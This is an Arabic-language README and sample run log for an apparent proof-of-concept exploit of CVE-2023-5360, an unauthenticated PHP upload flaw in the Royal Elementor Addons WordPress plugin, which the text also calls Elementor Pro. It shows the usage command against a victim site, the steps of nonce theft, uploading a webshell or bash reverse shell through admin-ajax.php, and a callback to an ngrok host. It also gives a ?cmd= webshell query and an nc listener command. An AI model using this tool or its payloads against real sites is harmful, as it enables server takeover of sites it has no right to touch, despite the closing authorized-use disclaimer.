
Royal Elementor Addons - تنفيذ تعليمات برمجية عن بعد غير مصادق عليه
إن إضافة Royal Elementor Addons and Templates لـ WordPress قبل الإصدار 1.3.79 لا تتحقق بشكل صحيح من الملفات المرفوعة، مما قد يسمح للمستخدمين غير المصادق عليهم برفع ملفات عشوائية، مثل PHP وتحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE).
_______ ________
/ ____/ | / / ____/
/ / | | / / __/______
/ /___ | |/ /__/_____/
\____/ |___/_____/_____
|__ \ / __ \__ \|__ /
__/ // / / /_/ / /_ <
/ __// /_/ / __/___/ /
/____/\____/____/____/____
/ ____/__ // ___// __ \
/___ \ /_ </ __ \/ / / /
____/ /___/ / /_/ / /_/ /
/_____//____/\____/\____/
بواسطة X3RX3S
هذا هو استغلال إثبات المفهوم لـ CVE-2023-5360، وهي ثغرة تحميل الملفات في Elementor Pro لـ WordPress. تسمح لمهاجم غير مصادق عليه برفع ملفات PHP عشوائية والحصول على تنفيذ التعليمات البرمجية عن بُعد.
python3 CVE-2023-5360.py <https://victim.site/>
مثال:
python3 CVE-2023-5360.py https://victim.site/
_______ ________
/ ____/ | / / ____/
/ / | | / / __/______
/ /___ | |/ /__/_____/
\____/ |___/_____/_____
|__ \ / __ \__ \|__ /
__/ // / / /_/ / /_ <
/ __// /_/ / __/___/ /
/____/\____/____/____/____
/ ____/__ // ___// __ \
/___ \ /_ </ __ \/ / / /
____/ /___/ / /_/ / /_/ /
/_____//____/\____/\____/
github.com/X3RX3SSec
by X3RX3S aka @mindfuckerrrr
[+] Target: https://victim.site
[+] Elementor page: https://victim.site)
[*] Step 1: Grabbing Elementor nonce...
[+] HTTP 200 received from target
[+] Nonce extracted: fdcb5015cd
[*] Step 2: Configure payload
[1] Simple command webshell
[2] Reverse shell (bash)
[?] Choose payload [1/2]: 2
[?] LHOST (your IP): 7.tcp.eu.ngrok.io
[?] LPORT (your PORT): 31337
[+] Reverse shell payload generated for 7.tcp.eu.ngrok.io:31337
[?] Start built-in listener? [Y/n]: Y
[+] Starting local listener on 7.tcp.eu.ngrok.io:31337...
[*] Attempt 1 of 3: Uploading payload via AJAX exploit...
[>] POST https://victim.site/wp-admin/admin-ajax.php
listening on [any] 31337 ...
[+] HTTP 200 from upload handler
[+] Shell uploaded: https://victim.site/wp-content/uploads/wpr-addons/forms/shell-6253.php
[*] Triggering reverse shell. Have your listener ready!
[+] Trigger sent (timeout is normal for reverse shell).
[+] Arrr! Cannons fired. Check your listener! 🏴☠️💣
خيارات الحمولة:
?cmd=id كما في: https://victim.site/wp-content/uploads/wpr-addons/forms/shell.php?cmd=id)requestsتثبيت التبعيات:
pip install requests
nc -lvnp 1337
هذا الاستغلال مخصص للاختبارات الأمنية التعليمية والمصرح بها فقط. أنت مسؤول عن كيفية استخدامه. اختبر فقط على الأنظمة التي تملكها أو لديك إذن لاختبارها.
المؤلف: X3RX3S CVE-2023-5360